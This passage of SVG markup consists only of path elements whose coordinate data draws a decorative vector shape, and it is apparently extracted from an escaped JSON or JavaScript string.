d=\"M902.5,29.9c-5.4-.8,0,1.3-4.5.8.2-.3-6.3-1.5-5.2-.9,7.9,1,7.5,3,7.5,3.6,2.6.4-.6.8,2.7,1.6-.9,0-3.8-.6-3-.2,3.5.5,3.4,1.3,5.8,2.1-1.3-.2-1.4-.1-3.1-.4.1-.3-.2-.6-3.4-1.1,2.6.8,1,1.3,0,1.7a14.29,14.29,0,0,0-4.5-1.2c3,.6-.1.5.3.7,1.3.2,2.6.4,3.8.6-.5.3-.5.6.8,1-3.3-.6-2.1-.4-5.3-.9.1.3,2,.7,1.4.9-3.9-.7-4.5-.6-3.9-.1,2.5.2,2,.1,6.1.6.5.3,1.7.8.3.7-4.8-1.3-.5.2-5.2-.9a23,23,0,0,1-4.5.8c4,.7.4-.5,5,.4.1.2.2.5.3.7a21,21,0,0,0-4.1-.5c10,1.6,1.9,2.3,9.7,4.2-1.6-.3-2.7-.6-4.3-.9.4.3-1.3,0-1.9,0,1.5.5,3.1.3,4.3.8.4.5-.4.2-2-.2-.6.4,5.1,1.1,4.5,1.4-6.7-1.2.8.7-3.8,0,4.4,1,0,.5.5,1.1,4.5.9-.1-.6,2.9-.1.1.2,1.9.4,2.2.6a62.51,62.51,0,0,0,7.1.7c-6.9-1.1.8-.2-2.4-1.1,1.6.4,2.6.6,3.1.4-2.4-.4-1.3-.5-3.3-.9-.3.2-.1.5-2.9,0-2.2-1.5,2.1-1.5,5.8-2.2,4.1.9-1.5.6.5,1a17,17,0,0,1,3.1.5h0v-.1a.33.33,0,0,1,0-.47h0a.18.18,0,0,0,0-.27h0a6.37,6.37,0,0,0-1.7-.6c-.1.1-.2.2-2-.1-1.4-.6.5-.4-1.4-.9-8.6-1-4.5-2-2.9-2,.9-.3-2.8-.8-2.4-1.1,4,.6,5.5.5,3.8-.1-5.1-1-1.1.5-4.9-.1-.9-.6,3.8,0,.5-.9a29.59,29.59,0,0,0,5.2.8c-3-1.4-.3-1.4-3.2-2.6,2.1.3,1.5.6,4.3.9-2.1-1.9.1-3.1-3.4-5.2,3.8.7.7-.6,4,.1-4.3-1.2,1.9-.8-3-2.2,0,.1-1.3-.1-1.1-.3,2.8.4,2.2.6,4.3.9-.7-.3.9-.5-1.4-.9-.1.1-.2.2-2-.1-.1-.8,2-1,4.3-1.2,1.5.6,1,.6-.7.6,1.9.3,2.3.3,4,.6h.2a.3.3,0,0,1-.2-.1c-3.1-1.5-8.9-2.8-8.5-3.9-4.2-.8-2.4-.1-5.1-.5.2.4,2.9.9,3.5,1.2-4.6,0,.1,2.2.4,3a28.56,28.56,0,0,0-4.3-.9C899,29.1,901.3,29.5,902.5,29.9Z\"></path>\n <path d=\"M907.2,42c.5-.1-1.5-.8.8-.4,1.1.2,2.6.4,1,.1-1.4-.2-2.8-.5-4.2-.7C906.5,41.4,903.8,41.3,907.2,42Z\"></path>\n <path d=\"M909.1,48.3c-.8.2-2.1-.5-3.2-.6a5.88,5.88,0,0,1-2-.2c-.1.5,4.1.8,4.4,1.1-3.1-.4-2.9.1-3.7.4C907.7,49.2,909.7,48.6,909.1,48.3Z\"></path>\n <path d=\"M738.1,23.9c-1.8-.7.8-.5-2.5-1.2C732.6,22.5,739.1,24.3,738.1,23.9Z\"></path>\n <path d=\"M846.8,41.2c-.8.2,4.8,1.7,4.4,1.2C846.9,41.9,851.1,41.8,846.8,41.2Z\"></path>\n <path d=\"M839.8,40.7c3.3.6,1.9,0,5.1.6-.6-.3.9-.4-1.3-.8C845.2,41.4,840,40.4,839.8,40.7Z\"></path>\n <path d=\"M772.5,29.2c-1.9.3,10.2,2,5.3.9C777.6,30.6,774.4,29.5,772.5,29.2Z\"></path>\n <path d=\"M757.7,26.5c-.3-.2.2-.4-1.3-.7-.7,0-2.7.4-.8.4.1-.4,4.1,1,4.1.6Z\"></path>\n <path d=\"M763.2,25.9a1.82,1.82,0,0,0-1.1-.2c4.2.8-.1.3.3.7,3.4.4,3.1-.2,8.1.7-2.1-.3-1.5-.6-4.3-.9C766.5,26.4,765.3,26.3,763.2,25.9Z\"></path>\n <path d=\"M774.2,24.6c-1,.2,2.2.5,2.5.7.2,0,.5-.1.7-.1C776,25,775.1,24.8,774.2,24.6Z\"></path>\n <path d=\"M776.7,25.3a.37.37,0,0,0-.3.1h.2C776.7,25.4,776.7,25.4,776.7,25.3Z\"></path>\n <path d=\"M768.8,23.4c-2.8.1-1.2.2-.4,1.2,5.6,1.1,3.4,1,8.8,2.4-2.4-1-2.2-1.3-.9-1.5-2-.4-2.1-.6-4.2-1-.7.3,3.4,1.2-.7.7C768.1,24.1,773.5,24.3,768.8,23.4Z\"></path>\n <path d=\"M752.7,22.1c-4.3-1.2-3.1-1.9-8.1-2.8C747.3,20.3,748.1,21.1,752.7,22.1Z\"></path>\n <path d=\"M847.2,35.8c2.5.5,1.3.7,3.4,1.1.7-.4-2.4-1.2,1.5-1C849,35.5,849.5,36.1,847.2,35.8Z\"></path>\n <path d=\"M744.4,18.9c1.4.2,2.3.4,3.2.6.3-.4-.8-.8-3.5-1.4C745.7,18.7,747.1,19,744.4,18.9Z\"></path>\n <path d=\"M736.1,17.6a10.11,10.11,0,0,1,3,.3c1,0,.8-.3,1.8-.3a17.84,17.84,0,0,1-3.3-.8c-1.9-.1.6.4,1.3.8C738.3,17.6,732.9,16.9,736.1,17.6Z\"></path>\n <path d=\"M874.1,39.7c.6-.5-1.7-1.3.4-1.3-2-.1-9.5-1.1-5.8,0C871.1,38.4,872.5,39.3,874.1,39.7Z\"></path>\n <path d=\"M819.1,29.6c-1-.2-2.1-.3-3.1-.5,1.1.4.6.7,2.4,1.1-.3-.3,1.1-.1.8-.3a10.32,10.32,0,0,1-2.2-.5A12.34,12.34,0,0,0,819.1,29.6Z\"></path>\n <path d=\"M745.7,17.5c-.4.2,2.1,1.1,3.4,1-1.9-.3-2.5-.6-2.3-.8,1.4.2,2.3.4,3.2.6C749.7,17.8,747.5,17.7,745.7,17.5Z\"></path>\n <path d=\"M1115.1,77.7a10.78,10.78,0,0,0-1.8-.2c.2,0,.5.1.7.1,3,.6,7.3,1.9,1.6.7.1.4,5,1.1,6.5,1.5-.3-.4-2.6-.9-3.5-1.4C1118.1,78.7,1116.6,78.1,1115.1,77.7Z\"></path>\n <path d=\"M759.6,18.2c1.6.2,3.9.7,4.1.6-1.9-.3-2.5-.6-2.3-.8-6.8-1.3-6.8-1.5-12.8-2.6-1.4-.2.1.4-1.9.1-1.7-.4,1.5-.5-3.5-1.4,3.4,1.5.5,1.8,3.2,2.8,0-.2,4,.7,5.3,1-.3-.6,4.8,0,.4-1.2,3.8.6,7.8.9,9.5,1.7C760.8,18.3,759.6,18,759.6,18.2Z\"></path>\n <path d=\"M909.6,43c.9.1,2,.3,3.1.4,2.4.3,4.3.5.8-.2a1.67,1.67,0,0,1-.8.1c-.7-.1-1.3-.4-.3-.4a19.06,19.06,0,0,0-3.1-.4,10.32,10.32,0,0,1,2.2.5C910.2,42.8,909.4,42.8,909.6,43Z\"></path>\n <path d=\"M849.5,32.8c-.4-.5,4.6.3,5,0-1.6-.5-2.5-.3-3.2-.6-1.1-.7,3.4-.1,1.5-.9a7.46,7.46,0,0,1-2.1-.3C851.5,31.8,848.9,32.2,849.5,32.8Z\"></path>\n <path d=\"M763.1,17.3c-1.2-.2-1.2-.4-1.2-.5-4.4-.6-3.1-1-6.5-1.5C755.9,15.7,761.8,17.1,763.1,17.3Z\"></path>\n <path d=\"M737.2,11.7c-1.9-.1-.3.7,1.5,1.1C735.7,11.8,741.3,12.5,737.2,11.7Z\"></path>\n <path d=\"M740.4,12.3c.6.1,1.2.2,1.1.3,3.5.7.6-.3,4.1.5,1.4.4.5.7,2.5,1.2-1.4-.6,1.5,0,1.9-.1-2.3-.4-.7-.5-1.3-.8a64.57,64.57,0,0,0,7.3,1.2c-2.4-.8.3-1-1.6-1.3-1.7-.1,0,.8-4.9-.1.8,0,1.2-.1.8-.4-3.6-.5-8.2-.8-5.8,0-2.9-.5-2.2-.6-4.2-.7A.3.3,0,0,1,740.4,12.3Z\"></path>\n <path d=\"M757.6,13.9c-2.3-.1,1.2.9,2.6,1.4C761.8,15.4,758.3,14.4,757.6,13.9Z\"></path>\n <path d=\"M876.6,33.6c-.5-.1-1.2-.3-1.6-.4a8.65,8.65,0,0,0,1.6.2c2.7.4,4.9.4,3.4-.1-1.1-.1-2.2-.1-3.3-.2-1.4-.1-2.9-.2-4.7-.4,1.2.3,3.2.6,4.6.9.2.2.5.2.7.3S877,33.8,876.6,33.6Z\"></path>\n <path d=\"M747.1,12.1c4.4.7,2.2-.1.7-.5-2.5-.3-4.5-1.1-5.3-.9C746.2,11.3,748.6,12,747.1,12.1Z\"></path>\n <path d=\"M895.6,29.6c.7-.7,0-1-2.9-2,.9.6,1.1.6-.7.7C899,29.4,890.9,28.7,895.6,29.6Z\"></path>\n <path d=\"M865.9,23.9c-1.3-.8,3.2-1.1-3.1-2.5C866.6,22.6,861.7,22.6,865.9,23.9Z\"></path>\n <path d=\"M880.3,21.7c0,.3,1.8.6,2.4,1-3.9-.6,1,.7-3-.3,2.9.8-1.5.5,1.6,1.3,0-.1.1-.1,1,.1.6.1,1.2.2,1,.1-1.2-.2-1.2-.4-1.2-.5,3.6.8,3.9.7,4.1.5,2.3.5,6.3,1,5.5,1.4,4.2.5,5.2.1,7.8.2-4.9-.8-4.2-.1-9.1-.8.8-.3-5.9-1-5.5-1.4-.2-.6,4.5.7,4,.2-.3-.4-3.3-.3-3.2-.6,3.4.4-2.3-.7-1.3-.8.6.1,3.9.4,4.2.7s-1.3,0-1.9,0c1.8.3,3.3.6,4.2.8-.4-.5.6-1.1-5-2.4-2.4-.1,1.7.5,1.3.8-4.2-.4-5.9-.8-3.3-.9-4.3-.7-3.4,0-.7.7a10.11,10.11,0,0,0-3-.3c1.2.2,3,.5,3.2.6s-.7.2-1.9,0c-1.3-.4-2.8-.8-4.4-1.2l-1.1-.3c-.9-.1-.1.3,1.1.6C878.1,21.3,879.6,21.7,880.3,21.7Z\"></path>\n <path d=\"M876.4,21.6c-3.5-.5-6.6-.9-7.1-.6C871.9,21.2,875.2,21.7,876.4,21.6Z\"></path>\n <path d=\"M886,15.3c-.7-.5-4.2-1.5.5-1-5.9-.9-4.2-1.4-6.8-2.1-5.6-.6,6.1,2.1-.3,1.4-.2-.2-.5-.3-2.2-.6h0c-.9.4,2.4,2-5.4.9,3.8,1,3.7,1.2-.7.7,2.4.4,4.4.6,6,.8a21.86,21.86,0,0,0,4.2.2c.2.2,3.5.7,3.3.9a25.55,25.55,0,0,0-2.9.1c1.8.3,3.3.6,4.3.8.7-.2-1.6-.6-1.3-.8,1.5.3,1.9.5,3.3.8.5-.3-2.5-.8-2.5-1.2a39.07,39.07,0,0,1,4.3.9c-1.9.3,7.6,2.4,4,2.3,4.3.5,1.1-.5,2.6-.6-.7-.3-5-.8-5.4-1.1-.1-.1-.1-.2-.2-.4a35.54,35.54,0,0,1,7.5,1.6c2.3.1-3.2-1-3.5-1.4,1.1,0,.6-.4,4,.2,2.1.5,5,1.1,6.6,1.6-2.4-.4-4-.7-5.3-1-.4.6,3.5.7,4.5,1.3.2.5-1.3.4-2.7.4,1.2.2,3,.5,3.2.6-5.1.3-1.7,2.6-7.4,2.9-1.2-.2-1.2-.4-1.2-.5a37.31,37.31,0,0,0-4.1-.5c2.8.7,7.2,1.6,10.8,2.3.5.6-3.5-.6-4-.2,2.6.7,5.1.8,8.4,1.4-3.3-1,.3-.8-3.7-1.7-1.1-.1-.1.4-3-.2a37.58,37.58,0,0,1,6,.3c-1.3-.6-1.5-1.2-.6-1.2,2,.1,2.1.4,4.3.8.6-.4-5.1-1.1-4.5-1.4,2,.3,3.5.5,4.1.5-7.2-1.1,4.7,0-1.6-1.3-1.4-.1-.2.5-2.9.1-.7-.8,2.7-.4,4.6-.5-1.2-.2-3-.5-3.2-.6,4.4.3-.8-1.2,2.1-1.6-4.9-.8-2.2-.7-2.4-1.1-3.3-.6-3-.3-6.2-.9,1.9.8-.5.1-4-.2-1.6-1-6.6-2.2-10.2-3.3C886.2,14.4,889.8,15.6,886,15.3Z\"></path>\n <path d=\"M911.8,26.9c.9.1-.1-.3,1.4-.1.5.1,1.3.2,2.6.4,0,.2.5.5,1.2.4,0-.2-.6-.3-1.2-.5-1.1-.2-1.9-.3-2.6-.4a25.93,25.93,0,0,1-3.7-.6C909.8,26.3,908.7,26.5,911.8,26.9Z\"></path>\n <path d=\"M869,18.1c3.1.5,7.9,1,6.1.6-1.9-.2-2.7-.2-5.1-.5-.2-.2,0-.4-2.3-.7C867.6,17.7,869,17.9,869,18.1Z\"></path>\n <path d=\"M889.3,20.3a19.07,19.07,0,0,0,2,.2,2.71,2.71,0,0,0,1.2.4c0-.5,1.8-.6-3.7-1.6C890.9,20,889.2,20.2,889.3,20.3Z\"></path>\n <path d=\"M876,16.6c-3.7-.6-3.1-.1-5-.3a18.2,18.2,0,0,0,3.1.5C871.2,16.2,877.4,17.2,876,16.6Z\"></path>\n <path d=\"M913.4,17.7c1.3.3.8.4,0,.3a12.05,12.05,0,0,0-1.9,0,7.14,7.14,0,0,0,1.9.2,10.53,10.53,0,0,1,3.3.5,10.36,10.36,0,0,0-2-.2c6.7.9,1.3-.3,2.6-.6a24.13,24.13,0,0,0-3.8-.4,4.87,4.87,0,0,1-1.2-.1C912.7,17.5,913.1,17.6,913.4,17.7Z\"></path>\n <path d=\"M870.1,10.2c3.7.9-.8.5,4.5,1.4-.4-.3-2.3-.8-.3-.7C872,10.7,870.2,9.9,870.1,10.2Z\"></path>\n <path d=\"M874.2,10.7c1.2.2,2.1.5,3,.7,1.2.3,2.5.6,4.5,1-.1-.2-.1-.3-.2-.5-1.1-.2-3.1-.5-4.3-.7-.6-.1-1-.2-1-.3a1.56,1.56,0,0,0,1-.1.18.18,0,0,0,0-.27h0a2.37,2.37,0,0,0-1.4-.5C873.5,9.9,877.5,11.1,874.2,10.7Z\"></path>\n <path d=\"M879.6,9.8a7.46,7.46,0,0,0-2.1-.3c1.2.3,7.4,1.8,6.5,1.4-3-.6-.4-.6.8-.4a15.73,15.73,0,0,1-3.3-.8C879.6,9.5,883.1,10.3,879.6,9.8Z\"></path>\n <path d=\"M910.2,11a12.17,12.17,0,0,1,3.4.4,41,41,0,0,0,4.9.9c-.2-.3-2.7-.8-4.9-1.1S909.6,10.6,910.2,11Z\"></path>\n <path d=\"M928.2,103.9c-3.3-.6-1.9,0-5.1-.6-1-.6,1.3-.2.7-.7-.5-.2-4.4-1.2-5.3-1,3.5.8.2.7.5,1.1a17.84,17.84,0,0,1,3.3.8C922.3,103,929.9,104.9,928.2,103.9Z\"></path>\n <path d=\"M761.4,34.5c3,.4,3.2.4,6.3,1l-.3-.6c-2.8-.7-3.6-.5-5.3-1,.2-.2,1.7,0,4.1.5a12.72,12.72,0,0,0-4.7-1.7C762.7,33.6,758.4,33.2,761.4,34.5Z\"></path>\n <path d=\"M824.9,41.9c0-.1.8,0,1.1.2a2.71,2.71,0,0,0,1.2.4c-.1-.7,3.2.1,4.7-.2-4.6-.9-5.8-.8-8.3-1.2C824.2,41.4,822.6,41.5,824.9,41.9Z\"></path>\n <path d=\"M818.7,34.9c-4.2-.4-.4.7,1.5,1.3a7.45,7.45,0,0,1-2-.1c-1.7-.4,0-.5-3.4-1,1.5,1,.4,1-.3,1.4,4.3.2,6,1.2,9.4,1.6-3.5-.8,6.1.5,1.7-.5-1.7-.1-4.3-1.2-2.5-1.2-1.5-.5-3.8-.5-4.3-.8-1.6-.7,1.9-.2,4,.3a49.92,49.92,0,0,0-8.7-2.1C813.7,34,818.2,34.5,818.7,34.9Z\"></path>\n <path d=\"M793.3,30.3c-8.2-1.2-3.4.8-4.1,1.5a7.13,7.13,0,0,1,3,.5c-3.3-.1,2.2,1.6,2,2.1.9-.4,2.2-1.1-1-2,2.7.3,1.8-.1.7-.6,1.8.3,3.3.6,4.3.8a36.07,36.07,0,0,0-8-2.5C791.9,30.3,793.9,30.7,793.3,30.3Z\"></path>\n <path d=\"M1701.8,92.1c1.7-.2,3.8-.5,1.8-1h-1.7c-3.4.2.2,1.2-7.4.6,2.7.7,4.2.9,1.4,1.6,5.8.2,4.8-.3,6-.5.1,0,.2-.1.4-.1h-.4C1699.1,92.5,1700.2,92.3,1701.8,92.1Z\"></path>\n <path d=\"M1676,91.4c-3.6-.4,0-.6-6.3-.8C1670.3,90.9,1671.3,91.2,1676,91.4Z\"></path>\n <path d=\"M1697.2,91.7c1-.3,4.5-.5-.8-.9C1697.5,91.1,1692.8,91.4,1697.2,91.7Z\"></path>\n <path d=\"M1669.2,85.2a66.58,66.58,0,0,1,7.2.3c-1.9-.4,2-.2,2.4-.4C1675.3,84.8,1673.1,85.2,1669.2,85.2Z\"></path>\n <path d=\"M1676.8,84.4c-.5.3-2.4-.2-4.4-.2a25.42,25.42,0,0,1-3.9.3c3.5.1,6.8.1,8.6.3C1675.7,84.6,1681.1,84.6,1676.8,84.4Z\"></path>\n <path d=\"M1649.6,83.4c-2.5,0-4.4-.1-5.8-.2.4.3,1.3.5,3.4.7C1645.7,83.6,1649.2,83.6,1649.6,83.4Z\"></path>\n <path d=\"M1653.4,81.5c-3,0-3-.8-4.6-.5,3.4.6-11.6,0-5.1.5C1646,81.2,1649.8,81.7,1653.4,81.5Z\"></path>\n <path d=\"M1663,81.3c-2.6.1-6.4,0-6.7.3C1661,81.8,1663,81.7,1663,81.3Z\"></path>\n <path d=\"M1656.4,80.1a37.64,37.64,0,0,1-4.5-.3c1.4.5-1.4,1.2,4,1.4C1656.5,80.7,1654.9,80.5,1656.4,80.1Z\"></path>\n <path d=\"M1697.3,80.8c-.4.3-7.1.6.8.9C1695.7,81.3,1701.4,81.1,1697.3,80.8Z\"></path>\n <path d=\"M1689.9,77.1c.2-1.1,1.6-1.1,3.6-2.2-7.2-.1-7.7,0-2.4.5-2.7-.1-3,.1-5.6,0C1690.9,76,1683.8,76.9,1689.9,77.1Z\"></path>\n <path d=\"M1695.3,73.8c-5.3,0-4.4.6-6.1,1C1695.7,74.8,1694.2,74.2,1695.3,73.8Z\"></path>\n <path d=\"M1424,67c-5.6-.2-1.5,1.4-.4,1.1C1423.5,67.5,1423.1,67.5,1424,67Z\"></path>\n <path d=\"M1644.3,71.1c-.3-.1-.6-.3-3-.3-.6.5,10,.7,10,.3C1647.2,71,1647.7,71.2,1644.3,71.1Z\"></path>\n <path d=\"M1448.2,66.1c0-.4,1.8-.7,1.8-1.2C1446.3,65,1444.3,66.1,1448.2,66.1Z\"></path>\n <path d=\"M1696.8,70.8c.2-.4,2.6-1-1.3-1.4C1695.3,69.9,1691.7,70.2,1696.8,70.8Z\"></path>\n <path d=\"M1473.3,64.6c2.5,0,3.4.2,3.1.4,1.4,0,2.8.1,4.3.1C1481.5,64.8,1475.4,64.4,1473.3,64.6Z\"></path>\n <path d=\"M1460.1,63.8c.9,0,1.6,0,1.3-.1-5.2-.3,3.9-.1.9-.5-3.4.1-6.2-.5-7.1-.2,2.2.2,4.2.6,2,.7C1458.2,63.7,1459.1,63.8,1460.1,63.8Z\"></path>\n <path d=\"M1642.1,67c-.6.5,7.3.4,10,.3C1648.7,67,1645.1,67.3,1642.1,67Z\"></path>\n <path d=\"M1649.2,64c-7.8.1-8,.9-5.7,1.4,4.5-.1,4.3-.6,7.6-.8-4.8-.5-2.8.3-5.3.3-.1-.1-1.3-.2-1.6-.3C1645.6,64.4,1649.5,64.4,1649.2,64Z\"></path>\n <path d=\"M1656.6,64.6c0,.1-.1.1-1.3.1-.1-.2-1.3-.3-3.1-.4,1,.2-1.1.7,2.1.8l-.3-.3C1657,65,1660.6,64.8,1656.6,64.6Z\"></path>\n <path d=\"M1647.3,63.5c.9-.1,0-.8-2.3-1a26.77,26.77,0,0,1-4.2,0C1639.7,63.1,1645,63.2,1647.3,63.5Z\"></path>\n <path d=\"M1499.7,58.4c4.8.2,7.4-.4,2.2-.6C1500.1,57.8,1501.6,58.3,1499.7,58.4Z\"></path>\n <path d=\"M1645.4,61.3c-1.1-.3.2-.4,4-.2-2-.2-1.5-.3-.5-.4,1.8,0,3.7.1,5.5.1-.2-.3,2.8-.2,4-.4a8.61,8.61,0,0,1-2.3-.4,20.74,20.74,0,0,0,5.1.3c1.4-.1,1.6-1.2-3.7-1.1,3.4.1,1.3.5-1,.4-1.52-.24-3.06-.41-4.6-.5.3.1-.8.4-.4.6a27.34,27.34,0,0,0-3-.1c.2,0,.3.1.4.1-3.7-.5.4-.9,3.8-1.3-3.5-.1-2.9.1-7,0,3.2-.1,2.1-.6-2.1-.8.9.8,2.8,1.3.3,2,1.6,0,4.4.4,5.4.3.2.1-.2.2-1.6.2h.3C1643.8,60.4,1640.9,61,1645.4,61.3Z\"></path>\n <path d=\"M1680,59.6c1.6.5-.5.8,3.6,1-1.3-.4,1.9-.7,5.2-.4C1687.3,59.4,1683.7,60.1,1680,59.6Z\"></path>\n <path d=\"M1695.3,59.6c1.7,0,4,.1,4.2,0-3.7-.2,3.4-.3,2.2-.6-4.9.1-1.2-.4-4.6-.4C1698.8,59.1,1696.5,59.3,1695.3,59.6Z\"></path>\n <path d=\"M1653.3,57.7c-.1-.3,5.4,0,5.3-.3-2.4-.1-4.7-.1-7.1-.2C1651.5,57.5,1649.1,57.5,1653.3,57.7Z\"></path>\n <path d=\"M1602,54.7c1.9.4-2.7.3-3.8.5a37.51,37.51,0,0,1,4.5.3C1603.9,55.4,1605.1,54.8,1602,54.7Z\"></path>\n <path d=\"M1575.4,54.4c-1-.4,3.6-.2,3.8-.5-2,0-3.2-.1-4.4-.2C1576.6,54,1570.9,54.1,1575.4,54.4Z\"></path>\n <path d=\"M1675.5,56.1c-.4.2-5.4,0-3.9.4C1676.2,56.7,1679.4,56.3,1675.5,56.1Z\"></path>\n <path d=\"M1647.1,55.3c-1.6-.4,3.5-.1,3.9-.3-4.4,0-3.6-.3-5.9-.4C1644.3,54.9,1644.1,55.1,1647.1,55.3Z\"></path>\n <path d=\"M1583,53.6c2.3.1,1.1.3,3.1.4-2.4-.4,7.7-.1,2.3-.5C1589.7,53.8,1581.7,53.2,1583,53.6Z\"></path>\n <path d=\"M1509.8,50.9c1.1,0,1.8.1,2.3.1-.8.1-.5.2-1.3.3,2.4-.1,2.1.1,2.2.3s.2.3,1,.4c-5,.1-2.2.9,1.1,1.2-.1,0-.1,0-.2-.1.8.1,2.1.2,4,.3-1.8-.1-2.3-.3-2.7-.6.6,0,1.1-.1.7-.2-.9-.3-4.9-.5-2.7-.7a2.08,2.08,0,0,1,.7.1l.9-.3c1,0,.8-.1.2-.1,1.1-.6,1-1.3-4.5-1.8-4.1.2,3.1.7,2.4,1.1C1512.3,50.9,1509.9,50.8,1509.8,50.9Z\"></path>\n <path d=\"M1654.3,54.1c-3.9-.1-5.2.5-2.1.7C1652.1,54.5,1654.3,54.4,1654.3,54.1Z\"></path>\n <path d=\"M1687.5,55.5c.3-.4,1.3-.5-3.4-.7C1685.1,55,1682.5,55.5,1687.5,55.5Z\"></path>\n <path d=\"M1557.1,52.6c.6-.2,3.2-.2,2.2-.6C1556.1,51.9,1552.2,52.4,1557.1,52.6Z\"></path>\n <path d=\"M1683.5,52.6c-5-.2-2.6.8-.6.9C1685.3,53.1,1682.1,52.9,1683.5,52.6Z\"></path>\n <path d=\"M1651.7,48c.8-.4-3.7-.6-.7-.8C1646.5,47,1647.4,48.1,1651.7,48Z\"></path>\n <path d=\"M1700.6,46.7c1,.2-1.1.6,2,.7-.3-.1,0-.1.4-.2.9-.1,2.3-.3,0-.4C1702.5,46.8,1701.7,46.8,1700.6,46.7Z\"></path>\n <path d=\"M1624.1,43.5c-3-.2-5.8-.4-8.8-.5C1614.6,43.3,1623.2,43.6,1624.1,43.5Z\"></path>\n <path d=\"M1673.4,42.6c-2.2-.5,4.5-.2,5.2-.4C1674.7,41.7,1666.6,42.4,1673.4,42.6Z\"></path>\n <path d=\"M1579.2,38.2c7.9.5,5.3.9,8.1,1.3.2-.3,6.7.1,5.3-.3-6.3,0-4.1-.5-6.3-.8C1582,38.3,1583.6,38.4,1579.2,38.2Z\"></path>\n <path d=\"M1590.9,38.9c2,.1,2.5.2,4.4.3a4.17,4.17,0,0,1-1.1-.3c2.4,0,3.7.5,5,.2-2.4-.4-1.9-1.1-6.1-1.3a15,15,0,0,0,1.5.4C1591.1,38.2,1590.1,38.5,1590.9,38.9Z\"></path>\n <path d=\"M1588.2,37.4c4.5.2-3,.5,3.4.7C1593.9,38,1591.6,37.2,1588.2,37.4Z\"></path>\n <path d=\"M1648.6,87c5.3.2,13.1.2,9.6-.1C1657.6,87.4,1648.9,86.5,1648.6,87Z\"></path>\n <path d=\"M1686.1,83.8c-1.5-.2-4.9-.3-6.1-.6,3-.5,2.4-1.3,6.9-1.6-4.6-.2-2.7.2-5.4.2-.1-.1-.3-.1-1.5-.1.7-.3,6.3-.1,6.6-.4-5.9-.2,1.2-.4-3.3-.6-2.1.2-.4.8-4.9.8.2-.2,2.1-.6-2.2-.9.4.3-.3.4-2.3.5-2.3-.4,2.9-.6-.7-.8-3.3.7-15,2.2-15.6,2.8,2-.1-.1-.6,5.2-.4-1.5.4-.2.3,4.4.3-.2.3-4.7.1-3.8.5,5.6,0,11.1.4,7.5.6,4.9,0,4.4-.2,8.5.2a17.16,17.16,0,0,1,5.2-.4C1684.7,83.9,1685.9,84,1686.1,83.8Z\"></path>\n <path d=\"M1684.2,80.1a52.3,52.3,0,0,0-5.6,0c.4.3,2.5.5,6.1.6,3.2-1,.7-1.9,4.5-2.8-4.2.2-4.2-.3-5.7-.1,3.2,1,2.4,1.5-5.3,1.8C1681.7,79.6,1683.7,79.8,1684.2,80.1Z\"></path>\n <path d=\"M1697.4,73.1c-4.4-.2-3,.7-2.3.6C1696.3,73.5,1698.9,73.5,1697.4,73.1Z\"></path>\n <path d=\"M1646.8,72.4l-.4-.4c-3.5-.1-2.9.1-7,0-.5-.2.9-.5-3.2-.5a22.4,22.4,0,0,0,4.8.8C1642.1,71.8,1644.9,72.3,1646.8,72.4Z\"></path>\n <path d=\"M1696.6,69a24,24,0,0,0,5.8-.2h2.4c3.1.3-1,.5,2,.7-1.5-.4,9.4-.2,6.6-.4a78.39,78.39,0,0,1-8.8-.5c2.5-.1,2.2-.5.8-.6-1.6.1-1.6.4-3,.5-.7,0-1.8,0-3.6-.1C1699.9,68.8,1694.7,68.6,1696.6,69Z\"></path>\n <path d=\"M1456.3,62.7c.8-.1,2.8-.1,5.5-.1a29.78,29.78,0,0,0-4.7-.7C1461.5,62.4,1452.3,62.7,1456.3,62.7Z\"></path>\n <path d=\"M1537.7,60.5c-1.1-.3.2-.4,4-.2.7.5,1.6.5.8.9,5.9.1,2.8.7,7.7.8-5.6-.7-.2-1.4-11.5-2-1.7-.4,6.7-.4,2.1-.8a25.51,25.51,0,0,1-4.1,0c1.7.5-2.1.1-2.6.3,1.7.1,3.3.2,4.5.3C1534.9,59.6,1535.2,60.2,1537.7,60.5Z\"></path>\n <path d=\"M1663.5,62.9c1.9,0,3.8.1,5.7.1C1670.4,62,1668.7,62.8,1663.5,62.9Z\"></path>\n <path d=\"M1529.9,58.1a123.6,123.6,0,0,0,14.4.5c-.6-.3-3.8-1.4,1.9-1.1-4,0,2.3.2,1.7.4-.7.5.6.5-.7.9a32.42,32.42,0,0,1,4.4.3c0-.2,4.6,0,4-.2-8.4-.2.9-1-5.6-1.7-7.4-.2-8.4-1.8-3.3-2.1,1.2.5.7.8,2.3,1-.1-.2,3.9,0,4.1-.1-.5-.2-1.3-.8-4.8-.8,4-.1.7-.5,2.1-.7-4.2,0-7.7-.5-4.6-.5a4,4,0,0,0,1.6.3c8.4-.9-5.6-2.6,5.4-3.4a24.44,24.44,0,0,0-4.1-.2,1.54,1.54,0,0,0-.8-.3c.3-.1.4-.1.4-.2,2.7,0,6.8.1,9,.3-.7-.4.3-1-3.1-1.5,3.4,1.1-.1,1.2-5.9,1.1-.4-.5-3.4-1.2,2.3-1.6-1.7-.1-4-.1-4.4-.2,3.8,0,1.9-1.1-1-1.1a5.6,5.6,0,0,1,.7-.2c-5.1,1,.6,2.5-2,3.4-3.5-.1-4.2.1-7.1-.2,3.9.5,6.1,1.2,2.7,1.5,4,.1,4.3.4,4.8.7-1.8,0-2.1-.2-4.4-.2.1.2.9.3,1.7.4a27.48,27.48,0,0,1-3-.2c2.3.4-3.4.5.6.7.6-.1,1.3-.2,2.6-.3-.1.2,1.8.3,1.8.5-5.5-.3-2.4.2-6.9.1,4.2.5,4.7.7,2.4,1.1a30.64,30.64,0,0,1,5.9.3c-6.8-.5-5.2.6-2,.9-1.9,0-3.2-.1-4.4-.2,1.7.8,1.5,1.4-2.5,1.9,6.3.1,4.7.8,3.7,1.1-1.7-.1-3.3-.2-4.4-.3,4.1.3,3.5-.4,1-.4C1537.9,58.3,1532.2,58,1529.9,58.1Z\"></path>\n <path d=\"M1508.8,54.5c-.6-.5-.4-1,3.2-1.1-8.4-.3,2.3-.3-4.7-.7.6.2-1.7.2-2.5.3C1512.5,53.4,1503.4,54.1,1508.8,54.5Z\"></path>\n <path d=\"M1515,53.7c.2.4-4.9-.3-4.1,0,1.3.1.5.3,2,.7,1.9,0,3.8.1,5.7.1C1518,54.2,1519.1,53.8,1515,53.7Z\"></path>\n <path d=\"M1662.7,57.3c1.1-.4-5-.3-6.1-.6-.6-.3,7.3-.3,2.2-.6.7.3-4,0-4,.2,3.2.2-1.8.5,3.4.7C1658.9,56.8,1660.7,57.3,1662.7,57.3Z\"></path>\n <path 